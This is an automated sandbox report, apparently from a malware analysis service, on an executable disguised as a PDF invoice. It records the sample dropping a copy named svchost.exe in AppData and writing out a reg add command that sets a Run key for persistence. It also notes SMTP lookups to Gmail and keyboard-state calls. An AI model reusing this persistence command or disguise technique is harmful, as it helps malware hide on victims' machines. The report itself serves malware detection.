Source: Cab_Invoice_pdf.exe, 00000003.00000003.329270034.000000000301F000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563150895.0000000002FF4000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329242201.0000000002FF9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.475545199.000000000107C000.00000004.00000001.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: Cab_Invoice_pdf.exe, 00000003.00000002.562902379.0000000002F00000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327138689.0000000000EA7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562961812.0000000002F40000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: Cab_Invoice_pdf.exe, 00000003.00000003.324419871.0000000000EC7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562792705.0000000002D90000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
Source: Cab_Invoice_pdf.exe, 00000003.00000002.565049121.00000000031C0000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481183510.00000000036C0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/BoboTiG/python-mss
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569019026.000000006F31E000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567155238.000000006EB1A000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567064488.000000006EAEB000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568756682.000000006F2D8000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/mail/?p=BadCredentials
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567452427.000000006EBF1000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568654900.000000006EE48000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449203486.0000000002C0C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482937530.000000000380C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: https://www.openssl.org/H
Source: svchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.c
Source: svchost.exe, 0000000C.00000003.391558399.0000020D1839A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391525038.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391498040.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391580111.0000020D18802000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown; DNS traffic detected: queries for: smtp.gmail.com
Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 19_2_6DA74420 PyArg_ParseTuple,PyEval_SaveThread,GetKeyboardState,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 19_2_6DA74C50 PyArg_ParseTuple,PyEval_SaveThread,ExitWindowsEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct
Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 19_2_6DA74BD0 PyArg_ParseTuple,PyEval_SaveThread,ExitWindowsEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Cab_Invoice_pdf.exe; Binary or memory string: OriginalFilename vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: python3.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
Source: Cab_Invoice_pdf.exe Virustotal: Detection: 62%
Source: Cab_Invoice_pdf.exe Metadefender: Detection: 33%
Source: Cab_Invoice_pdf.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File read: C:\Users\user\Desktop\Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Process created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File created: C:\Users\user\AppData\Local\Temp\_MEI24122
Source: classification engine Classification label: mal72.evad.winEXE@19/204@7/4
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA74150 _Py_NoneStruct,PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,GetDiskFreeSpaceW,PyEval_RestoreThread,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,Py_BuildValue,19_2_6DA74150
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01314860 GetLastError,FormatMessageW,1_2_01314860
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\mutex_var_xboz
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7A5B0 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,FindResourceExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,SizeofResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,LoadResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,LockResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,?PyWinObject_FreeResourceId@@YAXPA_W@Z,?PyWinObject_FreeResourceId@@YAXPA_W@Z,?PyWinObject_FreeResourceId@@YAXPA_W@Z,19_2_6DA7A5B0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: Cab_Invoice_pdf.exe Static file information: File size 7399848 > 1048576
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Cab_Invoice_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Cab_Invoice_pdf.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Cab_Invoice_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Cab_Invoice_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Cab_Invoice_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Cab_Invoice_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Cab_Invoice_pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01318356 push ecx; ret 1_2_01318369
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_01318356 push ecx; ret 3_2_01318369
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_6E2F50D4 push ecx; ret 3_2_6E2F50E6
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BC8356 push ecx; ret 11_2_00BC8369
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BC8356 push ecx; ret 19_2_00BC8369
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7DF66 push ecx; ret 19_2_6DA7DF79
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA93266 push ecx; ret 19_2_6DA93279
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DABA456 push ecx; ret 19_2_6DABA469
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DAEA8D4 push ecx; ret 22_2_6DAEA8E6
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DB0D4C4 push ecx; ret 22_2_6DB0D4D6
Source: libcrypto-1_1.dll.1.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.1.dr Static PE information: section name: .00cfg
Source: libcrypto-1_1.dll.11.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.11.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01314740 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01314740
Source: api-ms-win-core-console-l1-1-0.dll.1.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\ucrtbase.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\ucrtbase.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svchost
